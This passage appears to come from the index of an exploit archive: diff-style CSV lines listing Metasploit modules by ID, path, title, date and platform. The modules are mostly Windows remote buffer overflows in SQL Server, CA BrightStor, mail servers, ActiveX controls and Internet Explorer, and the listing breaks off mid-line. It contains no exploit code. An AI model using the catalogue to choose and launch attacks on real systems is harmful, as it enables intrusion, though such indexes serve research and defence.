+16393,platforms/windows/remote/16393.rb,"Microsoft SQL Server Resolution Overflow",2010-04-30,Metasploit,windows,remote,0 +16394,platforms/windows/remote/16394.rb,"Microsoft SQL Server Payload Execution via SQL injection",2011-02-08,Metasploit,windows,remote,0 +16395,platforms/windows/remote/16395.rb,"Microsoft SQL Server Payload Execution",2010-12-21,Metasploit,windows,remote,0 +16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,Metasploit,windows,remote,0 +16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,Metasploit,windows,remote,0 +16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,Metasploit,windows,remote,0 +16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0 +16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,Metasploit,windows,remote,0 +16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL Overflow",2010-04-30,Metasploit,windows,remote,0 +16404,platforms/windows/remote/16404.rb,"Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16405,platforms/windows/remote/16405.rb,"CA BrightStor Universal Agent Overflow",2010-06-22,Metasploit,windows,remote,0 +16406,platforms/windows/remote/16406.rb,"CA BrightStor Discovery Service Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16407,platforms/windows/remote/16407.rb,"CA BrightStor ARCserve Tape Engine Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16408,platforms/windows/remote/16408.rb,"CA BrightStor Discovery Service TCP Overflow",2010-04-30,Metasploit,windows,remote,0 +16409,platforms/windows/remote/16409.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (2)",2010-11-03,Metasploit,windows,remote,0 +16410,platforms/windows/remote/16410.rb,"Computer Associates Alert Notification Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16411,platforms/windows/remote/16411.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow (3)",2010-11-03,Metasploit,windows,remote,0 +16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Buffer Overflow",2010-10-05,Metasploit,windows,remote,0 +16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe Media Service Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 +16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow",2010-11-03,Metasploit,windows,remote,0 +16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow",2011-03-10,Metasploit,windows,remote,0 +16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow",2010-11-04,Metasploit,windows,remote,0 +16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow (1)",2010-10-05,Metasploit,windows,remote,0 +16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve Message Engine Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16420,platforms/windows/remote/16420.rb,"Firebird Relational Database SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0 +16422,platforms/windows/remote/16422.rb,"mIRC <= 6.34 - PRIVMSG Handling Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 +16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 +16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16425,platforms/windows/remote/16425.rb,"Asus Dpcproxy Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 +16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16427,platforms/windows/remote/16427.rb,"Windows RSH daemon Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 +16430,platforms/windows/remote/16430.rb,"BigAnt Server 2.2 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16431,platforms/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 - Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16432,platforms/windows/remote/16432.rb,"Firebird Relational Database isc_create_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16433,platforms/windows/remote/16433.rb,"Bomberclone 0.11.6 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16434,platforms/windows/remote/16434.rb,"Borland CaliberRM StarTeam Multicast Service Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 +16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 +16437,platforms/windows/remote/16437.rb,"Borland InterBase isc_create_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA Topology DELETEDEVICE Overflow",2010-09-20,Metasploit,windows,remote,0 +16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Buffer Overflow",2010-08-25,Metasploit,windows,remote,0 +16440,platforms/windows/remote/16440.rb,"Firebird Relational Database isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16441,platforms/windows/remote/16441.rb,"POP Peeper 3.4 - DATE Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16442,platforms/windows/remote/16442.rb,"Microsoft DirectX DirectShow SAMI Buffer Overflow",2010-10-05,Metasploit,windows,remote,0 +16443,platforms/windows/remote/16443.rb,"Eureka Email 2.2q ERR Remote Buffer Overflow Exploit",2010-08-25,Metasploit,windows,remote,0 +16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16445,platforms/windows/remote/16445.rb,"Bopup Communications Server Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow Exploit (Windows)",2010-10-09,Metasploit,windows,remote,0 +16447,platforms/windows/remote/16447.rb,"Borland InterBase isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16448,platforms/windows/remote/16448.rb,"BakBone NetVault Remote Heap Overflow",2010-09-20,Metasploit,windows,remote,0 +16449,platforms/windows/remote/16449.rb,"Borland InterBase SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16450,platforms/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow",2010-07-03,Metasploit,windows,remote,0 +16451,platforms/windows/remote/16451.rb,"eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow",2010-09-20,Metasploit,windows,remote,0 +16452,platforms/windows/remote/16452.rb,"AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow",2010-05-11,Metasploit,windows,remote,0 +16453,platforms/windows/remote/16453.rb,"Borland Interbase Create-Request Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net Font Field Overflow",2010-06-15,Metasploit,windows,remote,0 +16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2)",2010-09-20,Metasploit,windows,remote,0 +16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 Alert Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 +16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16460,platforms/windows/remote/16460.rb,"SecureCRT <= 4.0 Beta 2 SSH1 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16462,platforms/windows/remote/16462.rb,"FreeFTPd 1.0.10 - Key Exchange Algorithm String Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16463,platforms/windows/remote/16463.rb,"PuTTy.exe <= 0.53 - Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16464,platforms/windows/remote/16464.rb,"ISS PAM.dll ICQ Parser Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow",2010-06-15,Metasploit,windows,remote,0 +16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 - Overflow (Win32)",2010-05-09,Metasploit,win_x86,remote,0 +16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS CGI Filename Double Decode Command Execution",2011-01-08,Metasploit,windows,remote,0 +16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - (.htr) Path Overflow",2010-04-30,Metasploit,windows,remote,0 +16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 Printer Host Header Overflow",2010-04-30,Metasploit,windows,remote,0 +16470,platforms/windows/remote/16470.rb,"Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow",2010-07-25,Metasploit,windows,remote,0 +16471,platforms/windows/remote/16471.rb,"Microsoft IIS WebDAV Write Access Code Execution",2010-09-20,Metasploit,windows,remote,0 +16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 IDQ Path Overflow",2010-06-15,Metasploit,windows,remote,0 +16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 +16474,platforms/windows/remote/16474.rb,"Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow",2010-07-01,Metasploit,windows,remote,0 +16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD (2.35) Login Request Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16476,platforms/windows/remote/16476.rb,"Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow",2010-06-22,Metasploit,windows,remote,0 +16478,platforms/windows/remote/16478.rb,"Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16479,platforms/windows/remote/16479.rb,"IMail IMAP4D - Delete Overflow",2010-09-20,Metasploit,windows,remote,0 +16480,platforms/windows/remote/16480.rb,"MailEnable IMAPD W3C Logging Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow",2010-08-25,Metasploit,windows,remote,0 +16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 IMAPD FETCH Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16483,platforms/windows/remote/16483.rb,"Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16484,platforms/windows/remote/16484.rb,"Mercury/32 4.01a - IMAP RENAME Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16486,platforms/windows/remote/16486.rb,"Novell NetMail <= 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16487,platforms/windows/remote/16487.rb,"Ipswitch IMail IMAP SEARCH Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16488,platforms/windows/remote/16488.rb,"Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 Client Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= 3.3.3r7 - GET Overflow",2009-12-06,Metasploit,windows,remote,0 +16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 +16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",2010-12-01,Metasploit,windows,remote,0 +16494,platforms/windows/remote/16494.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 +16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit",2011-01-22,Metasploit,multiple,remote,0 +16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16497,platforms/windows/remote/16497.rb,"RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration",2010-09-20,Metasploit,windows,remote,0 +16500,platforms/windows/remote/16500.rb,"Hyleos ChemView ActiveX Control Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0 +16501,platforms/windows/remote/16501.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 +16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use After Free (1)",2010-04-30,Metasploit,windows,local,0 +16504,platforms/windows/local/16504.rb,"Adobe util.printf() Buffer Overflow",2010-05-03,Metasploit,windows,local,0 +16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow",2010-07-16,Metasploit,windows,remote,0 +16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16508,platforms/windows/remote/16508.rb,"Novell iPrint Client ActiveX Control Buffer Overflow",2008-06-16,Metasploit,windows,remote,0 +16509,platforms/windows/remote/16509.rb,"Mozilla Firefox - Interleaving document.write and appendChild Exploit",2011-02-22,Metasploit,windows,remote,0 +16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager Stack Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16511,platforms/windows/remote/16511.rb,"Logitech VideoCall ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16512,platforms/windows/remote/16512.rb,"Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 +16513,platforms/windows/remote/16513.rb,"Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16514,platforms/windows/remote/16514.rb,"Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow",2010-09-21,Metasploit,windows,remote,0 +16515,platforms/windows/remote/16515.rb,"Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution",2010-05-26,Metasploit,windows,remote,0 +16516,platforms/windows/remote/16516.rb,"Microsoft WMI Administration Tools ActiveX Buffer Overflow",2011-01-14,Metasploit,windows,remote,0 +16517,platforms/windows/remote/16517.rb,"IBM Access Support ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16518,platforms/windows/remote/16518.rb,"Chilkat Crypt ActiveX WriteFile Unsafe Method",2010-09-20,Metasploit,windows,remote,0 +16519,platforms/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow",2010-09-20,Metasploit,windows,remote,0 +16521,platforms/windows/remote/16521.rb,"Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16523,platforms/windows/remote/16523.rb,"Novell iPrint Client ActiveX Control target-frame Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16524,platforms/windows/remote/16524.rb,"AwingSoft Winds3D Player SceneURL Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger - goaway Overflow",2010-07-03,Metasploit,windows,remote,0 +16526,platforms/windows/remote/16526.rb,"Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",2010-08-12,Metasploit,windows,remote,0 +16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 RTSP URI Buffer Overflow",2010-05-04,Metasploit,windows,remote,0 +16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16529,platforms/windows/remote/16529.rb,"WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16530,platforms/windows/remote/16530.rb,"mIRC IRC URL Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow",2010-04-30,Metasploit,windows,local,0 +16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling",2010-07-03,Metasploit,windows,remote,0 +16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use After Free",2011-02-08,Metasploit,windows,remote,0 +16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16535,platforms/windows/remote/16535.rb,"Trend Micro OfficeScan Client ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16536,platforms/windows/remote/16536.rb,"Green Dam URL Processing Buffer Overflow",2010-03-10,Metasploit,windows,remote,0 +16537,platforms/windows/remote/16537.rb,"Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption",2010-07-20,Metasploit,windows,remote,0 +16538,platforms/windows/remote/16538.rb,"McAfee Visual Trace ActiveX Control Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 +16539,platforms/windows/remote/16539.rb,"Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16540,platforms/windows/remote/16540.rb,"Zenturi ProgramChecker ActiveX Control Arbitrary File Download",2010-11-24,Metasploit,windows,remote,0 +16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution",2010-09-28,Metasploit,windows,remote,0 +16542,platforms/windows/webapps/16542.rb,"Microsoft OWC Spreadsheet HTMLURL Buffer Overflow",2010-04-30,Metasploit,windows,webapps,0 +16543,platforms/windows/remote/16543.rb,"Novell iPrint Client ActiveX Control Date/Time Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail epi.dll AuthCredential Format String Exploit",2010-09-20,Metasploit,windows,remote,0 +16545,platforms/windows/remote/16545.rb,"Microsoft Help Center XSS and Command Execution",2010-09-20,Metasploit,windows,remote,0 +16546,platforms/windows/local/16546.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow (1)",2010-09-20,Metasploit,windows,local,0 +16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption",2010-07-12,Metasploit,windows,remote,0 +16548,platforms/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow",2010-05-09,Metasploit,windows,remote,0 +16549,platforms/windows/remote/16549.rb,"Microsoft Internet Explorer - isComponentInstalled Overflow",2010-05-09,Metasploit,windows,remote,0 +16550,platforms/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker",2010-09-24,Metasploit,windows,remote,0 +16551,platforms/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption",2011-01-20,Metasploit,windows,remote,0 +16552,platforms/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab ActiveX Unsafe Method",2010-09-20,Metasploit,windows,remote,0 +16553,platforms/windows/remote/16553.rb,"BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16554,platforms/windows/remote/16554.rb,"America Online ICQ ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 +16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption",2010-07-12,Metasploit,windows,remote,0 +16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 - (ASX Filename) Buffer Overflow",2010-05-09,Metasploit,windows,local,0 +16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16558,platforms/windows/remote/16558.rb,"Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow",2011-01-08,Metasploit,windows,remote,0 +16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer ActiveX Control Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16560,platforms/windows/remote/16560.rb,"Autodesk IDrop ActiveX Control Heap Memory Corruption",2010-04-30,Metasploit,windows,remote,0 +16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution",2010-09-20,Metasploit,windows,remote,0 +16562,platforms/windows/local/16562.rb,"Apple ITunes 4.7 Playlist Buffer Overflow",2010-05-09,Metasploit,windows,local,0 +16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow",2010-07-03,Metasploit,windows,remote,0 +16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll 4.9 - ActiveX Remote Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow",2010-07-26,Metasploit,windows,remote,0 +16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption",2010-04-30,Metasploit,windows,remote,0 +16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16569,platforms/windows/remote/16569.rb,"Orbit Downloader Connecting Log Creation Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16570,platforms/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 SceneURL Download and Execute",2010-09-20,Metasploit,windows,remote,0 +16571,platforms/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16572,platforms/windows/remote/16572.rb,"GOM Player ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16573,platforms/windows/remote/16573.rb,"Macrovision InstallShield Update Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16574,platforms/windows/remote/16574.rb,"Microsoft Windows Shell LNK Code Execution",2010-09-21,Metasploit,windows,remote,0 +16575,platforms/windows/remote/16575.rb,"SAP AG SAPgui EAI WebViewer3D Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16576,platforms/windows/remote/16576.rb,"Persits XUpload ActiveX AddFile Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16577,platforms/windows/remote/16577.rb,"CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16578,platforms/windows/remote/16578.rb,"Microsoft Internet Explorer - createTextRange() Code Execution",2010-09-20,Metasploit,windows,remote,0 +16579,platforms/windows/remote/16579.rb,"Oracle Document Capture 10g ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16580,platforms/windows/remote/16580.rb,"HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16581,platforms/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020)",2010-08-25,Metasploit,windows,remote,0 +16582,platforms/windows/remote/16582.rb,"Symantec BackupExec Calendar Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16583,platforms/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption",2010-09-20,Metasploit,windows,remote,0 +16584,platforms/windows/remote/16584.rb,"RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",2010-06-15,Metasploit,windows,remote,0 +16585,platforms/windows/remote/16585.rb,"Sun Java Web Start Plugin Command Line Argument Injection",2010-09-21,Metasploit,windows,remote,0 +16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer SMIL Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16587,platforms/windows/remote/16587.rb,"Sun Java Runtime New Plugin docbase Buffer Overflow",2011-01-08,Metasploit,windows,remote,0 +16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution",2011-01-08,Metasploit,windows,local,0 +16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviors Use After Free",2010-12-14,Metasploit,windows,remote,0 +16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit",2010-06-15,Metasploit,windows,local,0 +16594,platforms/windows/remote/16594.rb,"Adobe Shockwave - rcsL Memory Corruption",2010-10-22,Metasploit,windows,remote,0 +16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution",2010-10-04,Metasploit,windows,remote,0 +16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - VML Fill Method Code Execution",2010-07-03,Metasploit,windows,remote,0 +16598,platforms/windows/remote/16598.rb,"Persits XUpload ActiveX MakeHttpRequest Directory Traversal",2010-11-11,Metasploit,windows,remote,0 +16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption",2010-07-12,Metasploit,windows,remote,0 +16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 +16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16602,platforms/windows/remote/16602.rb,"Macrovision InstallShield Update Service ActiveX Unsafe Method",2010-09-20,Metasploit,windows,remote,0 +16603,platforms/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 +16604,platforms/windows/remote/16604.rb,"WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer 